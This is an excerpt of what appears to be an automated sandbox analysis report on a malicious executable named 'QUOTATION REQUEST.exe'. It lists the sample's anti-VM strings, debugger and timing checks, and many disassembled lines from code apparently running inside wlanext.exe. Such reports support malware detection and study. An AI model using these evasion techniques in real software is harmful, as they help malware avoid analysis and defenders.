Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Code function: 3_2_004088B0 rdtsc

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Code function: 3_2_00409B20 LdrLoadDll,

Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03623B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03623B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036753CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036753CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03601B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03601B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03684257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03634A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03634A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03608A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03613A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036841E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036769A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03610050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03610050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036390AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03673884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03673884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036337F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03608794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03628E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036216E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036076E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03638EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036236CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036746A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03633D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03673540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036A3D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03617D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0367A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036A8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036235A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03621DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03621DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03621DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368C450 mov eax, dword ptr fs:[00000030h]
